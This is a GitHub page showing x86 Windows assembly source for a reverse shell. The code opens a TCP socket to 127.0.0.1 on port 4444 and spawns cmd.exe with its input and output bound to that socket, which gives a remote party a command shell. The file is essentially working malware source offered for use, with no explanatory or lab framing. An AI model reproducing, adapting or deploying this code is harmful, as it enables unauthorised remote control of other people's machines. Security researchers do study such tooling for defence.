x86-Assembly-ReverseShell/reverse_shell.asm at main · x64n/x86-Assembly-ReverseShell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
bits 32

section .data

    wsaData db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00


    sockaddr_in:
        dw 0x0002          ; AF_INET
        dw 0x5C11          ; Port 4444 (little-endian)
        dd 0x0100007F      ; IP 127.0.0.1 (little-endian)
        db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00


    ws2_32_dll db 'ws2_32.dll', 0
    kernel32_dll db 'kernel32.dll', 0
    cmd db 'cmd.exe', 0
    CreateJobObject_name db 'CreateJobObjectA', 0
    SetJobObject_name db 'SetInformationJobObject', 0

    jobinfo:
        dd 0, 0, 0, 0
        dd 0, 0, 0, 0
        dd 2
        dd 0
        dd 0, 0

section .bss
    hSocket resd 1
    startupinfo resb 68
    processinfo resb 16
    hJob resd 1

section .text
    global Start

extern _LoadLibraryA@4
extern _GetProcAddress@8
extern _WSAStartup@8
extern _WSASocketA@24
extern _connect@12
extern _CreateProcessA@40
extern _WaitForSingleObject@8
extern _CloseHandle@4
extern _CreateJobObjectA@8
extern _SetInformationJobObject@16
extern _AssignProcessToJobObject@8

Start:

    push edi
    mov edi, startupinfo
    xor eax, eax
    mov ecx, 17
    rep stosd
    pop edi


    push ws2_32_dll
    call _LoadLibraryA@4
    test eax, eax
    jz exit


    push wsaData
    push 0x0202
    call _WSAStartup@8
    test eax, eax
    jnz exit


    push 0
    push 0
    push 0
    push 6
    push 1
    push 2
    call _WSASocketA@24
    mov [hSocket], eax
    cmp eax, -1
    je exit


    push 16
    push sockaddr_in
    push dword [hSocket]
    call _connect@12
    test eax, eax
    jnz exit


    push 0
    push 0
    call _CreateJobObjectA@8
    mov [hJob], eax


    push 0x00000008
    push jobinfo
    push 7
    push dword [hJob]
    call _SetInformationJobObject@16


    mov dword [startupinfo], 68
    mov dword [startupinfo + 44], 0x101
    mov dword [startupinfo + 48], 0
    mov eax, [hSocket]
    mov [startupinfo + 56], eax
    mov [startupinfo + 60], eax
    mov [startupinfo + 64], eax


    push processinfo
    push startupinfo
    push 0
    push 0
    push 0
    push 1
    push 0
    push 0
    push cmd
    push 0
    call _CreateProcessA@40


    push dword [processinfo]
    push dword [hJob]
    call _AssignProcessToJobObject@8


    push -1
    push dword [processinfo]
    call _WaitForSingleObject@8

exit:
    ret